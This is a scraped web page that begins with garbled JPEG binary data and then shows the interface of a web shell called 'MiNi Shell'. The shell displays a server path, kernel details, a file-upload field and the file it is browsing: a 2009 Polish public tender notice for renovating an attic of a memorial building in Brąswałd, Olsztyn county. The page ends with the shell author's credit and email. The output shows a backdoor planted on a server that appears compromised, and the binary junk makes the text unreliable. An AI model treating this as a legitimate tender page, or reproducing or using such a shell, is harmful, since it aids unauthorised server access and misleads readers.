JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090907/149683-N-2009.html

<p class="kh_header"><b>Olsztyn: Remont poddasza budynku z izbą pamięci Marii Zientary Malewskiej w Brąswałdzie</b><br>
<b>Numer ogłoszenia: 149683 - 2009; data zamieszczenia: 07.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Olsztynie , Plac Bema 5, 10-516 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5210535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www. powiat-olsztynski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont poddasza budynku z izbą pamięci Marii Zientary Malewskiej w Brąswałdzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: wykonanie robót budowlanych zadania inwestycyjnego p.n. Remont poddasza  budynku z izbą pamięci Marii Zientary Malewskiej w Brąswałdzie.
Budynek położony na działce geodezyjnej nr 139, obręb 1 Brąswałd. 
Kod CPV: 45210000-2 (roboty budowlane w zakresie budynków).
2. Przedmiot zamówienia obejmuje wykonanie następujących robót budowlanych:
1) Remont konstrukcji dachu:
       a) rozbiórka konstrukcji : słupy, zastrzały, miecze, jętki, płatwie, murłaty
       b) wymiana elementów konstrukcyjnych: słupy, zastrzały, miecze, jętki, płatwie, murłaty
2) Wymiana belek stropowych:
       a) rozebranie elementów stropu
       b) wymiana belek stropowych 
       c) wykonanie podsufitki z odzyskanych materiałów
 3) Rozebranie komina i przemurowanie komina

3. Zakres robót został szczegółowo opisany w następującej dokumentacji, stanowiącej integralną część SIWZ:
1)Rysunki techniczne - załącznik nr 6 do SIWZ
2)Specyfikacje Techniczne Wykonania i Odbioru Robót - załącznik nr 7 do SIWZ
3)Przedmiar robót- załącznik nr 8 do SIWZ
W 2006roku dokonano remontu dachu budynku ( częściowa wymiana elementów konstrukcji dachowej- krokwi ,nowa dachówka holenderka, stolarka okienna, lukarny ). Wskazana jest wymiana punktowa elementów konstrukcyjnych w celu zapobieżenia uszkodzeniu wyremontowanych wcześniej połaci dachu . Ważne jest dokonanie wizji lokalnej przed złożeniem oferty. Osoba do kontaktu :  Pani Joanna Zawadzka, tel. 602 732 570.

4. Wymagania stawiane wykonawcy dotyczące robót:  
1)roboty należy prowadzić zgodnie z obowiązującymi normami, specyfikacją techniczną wykonania i odbioru robót, pod stałym nadzorem technicznym, z zachowaniem obowiązujących przepisów bhp i przeciwpożarowych dla tego rodzaju robót.
2)przy wykonywaniu robót należy stosować materiały i urządzenia dopuszczone do obrotu i stosowania w budownictwie, posiadające stosowne aprobaty, certyfikaty i atesty.
3)użyte nazwy handlowe w dokumentacji technicznej i przedmiarach należy traktować jako formę określenia rodzaju i jakości oraz standardu zastosowanych materiałów, osprzętu, urządzeń.
4)wszystkie wskazania z nazwy wyrobów użyte w dokumentacji technicznej należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych.
5)oferent powinien dokonać oględzin miejsca budowy i rozpoznać wszelkie uwarunkowania, które mogą mieć wpływ na przyszły proces realizacji zadania i podaną w ofercie cenę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości 2.000 złotych (dwa tysiące złotych), w terminie do dnia 30.09.2009r., do godz. 12.00.
2.Wadium może być wnoszone w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych, tj: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej ( z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty o których mowa w art. 6b, ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. 2007r., Nr 42, poz. 275 ), przy czym:  
1) wadium wnoszone w formie pieniężnej powinno być wpłacone przelewem na konto Starostwa Powiatowego w Olsztynie- Warmiński Bank Spółdzielczy w Jonkowie, nr konta 49 8857 0002 3001 0000 3900 0003. Na przelewie należy umieścić informację (Wadium - przetarg na remont poddasza budynku w Brąswałdzie). Wymagane dołączenie kopii wpłaty do oferty.
3. wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej lub gwarancji ubezpieczeniowej i poręczeniach udzielanych przez podmioty, należy dołączyć do oferty w formie kopii, natomiast oryginał należy złożyć odrębnie w siedzibie Starostwa Powiatowego w Olsztynie, Pl. Bema 5- Biuro Obsługi Interesanta (na parterze), w terminie do dnia 30.09.2009r.,do godz. 12.00.
3) W przypadku wniesienia wadium w innej formie niż pieniężna, termin ważności dokumentu stwierdzającego zabezpieczenie wadium nie może być krótszy niż termin związania z ofertą. Jeżeli termin ważności wadium będzie krótszy, to taka oferta podlega odrzuceniu ze względu na nieskutecznie wniesione wadium.
3.  Zamawiający zwraca niezwłocznie wadium, jeżeli upłynął termin związania ofertą, zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy, zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
4.  Z zastrzeżeniem art. 46, ust. 4a  ustawy Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który wycofał ofertę przed upływem terminu składania ofert; który został wykluczony z postępowania; którego oferta została odrzucona.
5.   Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie  art. 46, ust.2 pkt. 2 i 3 ustawy, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
6.Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy , lub pełnomocnictw, chyba że udowodni, że udowodni że wynika to z przyczyn nie leżących po jego stronie.
8.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn lezących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki art. 22 ustawy Prawo zamówień publicznych, w tym nie podlegają wykluczeniu na podstawie art. 24 tej ustawy.
2.  Za spełnienie warunków udziału w postępowaniu uważać się będzie:
1)posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, potwierdzone odpowiednimi dokumentami, wymienionymi w rozdziale IX
2)nie zaleganie z podatkami, opłatami oraz składkami na ubezpieczenia zdrowotne i społeczne, potwierdzone wymaganymi w Rozdziale IX zaświadczeniami,
3)niekaralność osób i podmiotów w zakresie określonym w art.24 ust.1 pkt 4-9 ustawy, potwierdzone wymaganą w Rozdziale IX informacją z Krajowego Rejestru Karnego
4)wykonanie zamówień porównywalnych, co do zakresu rzeczowego z przedmiotem niniejszego zamówienia, wyrażające się należytym wykonaniem, w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, poświadczonych wymaganym w Rozdziale IX wykazem i dokumentami potwierdzającymi (np. referencje, protokóły odbioru itp)
5)posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, potwierdzone dokumentami wymienionymi w Rozdziale IX 
6)dysponowanie osobami zdolnymi do wykonania zamówienia- kierownika budowy i pracowników do wykonania robót określonych w niniejszej specyfikacji potwierdzone dokumentami wymienionymi w Rozdziale IX,
7)znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.: posiadanie płynności finansowej, posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, poświadczone dokumentami wymaganymi w Rozdziale IX,
8)nie podleganie wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 pkt. 1-9 oraz  ust. 2 ustawy, potwierdzone dokumentami dotyczącymi art. 24 ust. 2 pkt 3 i 4 ustawy , wymaganymi w Rozdziale IX.
3. W przypadku wspólnego ubiegania się o zamówienie, za spełnienie warunków udziału w postępowaniu uważać się będzie spełnienie warunków określonych w ust. 2 niniejszego rozdziału, odrębnie przez każdego z wykonawców. Każdy z występujących podmiotów ponosi solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. Zamawiający żąda wskazania w ofercie, zakresu robót,  które wykonawca zamierza powierzyć podwykonawcom.
4. W przypadku wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, za spełnienie warunków udziału w postępowaniu uważać się będzie spełnienie wymagań określonych w ust.2 z tym, że zamiast dokumentów określonych w ust.1 i 2 pkt.1, wykonawca złoży dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzając odpowiednio:
1)nie podleganie przez firmę likwidacji,
2)nie zaleganie z bieżącą zapłatą podatków, opłat i składek na ubezpieczenia zdrowotne,
3)nie podleganie zakazowi ubiegania się o zamówienie,
4)nie podlega wykluczeniu w zakresie określonym w art. 24 ust. pkt 4-8 ustawy prawo zamówień publicznych.
5.  Zamawiający wezwie wykonawców, którzy w wyznaczonym terminie nie złożyli oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierające błędy do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania.
6. Ocena spełnienia warunków wymaganych od wykonawców- zostanie dokonana na podstawie dokumentów, o których mowa w rozdziale IX, na druku UZP ZP-17 oraz formuły- spełnia,nie spełnia. Nie spełnienie choćby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. Zamawiający zawiadomi niezwłocznie wykonawcę o wykluczeniu z postępowania, podając uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełnienia warunków udziału w postępowaniu wykonawca zobowiązany jest dostarczyć następujące oświadczenia i dokumenty w formie oryginału lub poświadczonej przez wykonawcę kopii, w następującym zakresie: 
1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) Zaświadczenie o nie zaleganiu w opłacaniu podatków w Urzędzie Skarbowym, oraz o nie zaleganiu z opłatami i składkami na ubezpieczenia społeczne ZUS, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
3) Aktualną informację z Krajowego Rejestru Karnego o niekaralności, w zakresie określonym w art. 24 ust. 1 pkt. 4-9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4) Wykaz wykonanych robót w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, daty i miejsca wykonania z załączeniem dokumentów potwierdzających należyte ich wykonanie wg. załącznika nr 3 do SIWZ
5) Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca wg. załącznika nr 4a do SIWZ. Jeżeli w wykazie wykonawca wskaże narzędzia i urządzenia, którymi będzie dysponował, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia narzędzi i urządzeń niezbędnych do wykonania zamówienia.
6) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia wg wzoru stanowiącego załącznik nr 4b do SIWZ , kopie uprawnień i aktualne zaświadczenia przynależności do właściwej izby samorządu zawodowego osób pełniących samodzielne funkcje techniczne w budownictwie ( zgodnie z ustawą z dnia 7 lipca 1994r.  Prawo budowlane). Jeżeli w wykazie wykonawca wskaże osoby, którymi będzie dysponował, należy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
7) oświadczenie wykonawcy o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, wykazane w arkuszu oświadczeń, stanowiącym załączniki nr 2 do SIWZ, 
8) Potwierdzoną kopię polisy lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
9) Dokument potwierdzający wniesienie wadium
10) Zbiorcze oświadczenie o spełnieniu warunków udziału w postępowaniu na formularzu arkusza oświadczeń i wykazu dokumentów, stanowiącym załącznik nr 2 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip powiat-olsztynski.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Olsztynie
10-516 Olsztyn, Plac Bema 5, pok.218.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2009 godzina 12:00, miejsce: Ofertę należy złożyć w siedzibie prowadzącego postępowanie: Starostwo Powiatowe w Olsztynie  Biuro Obsługi Interesanta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com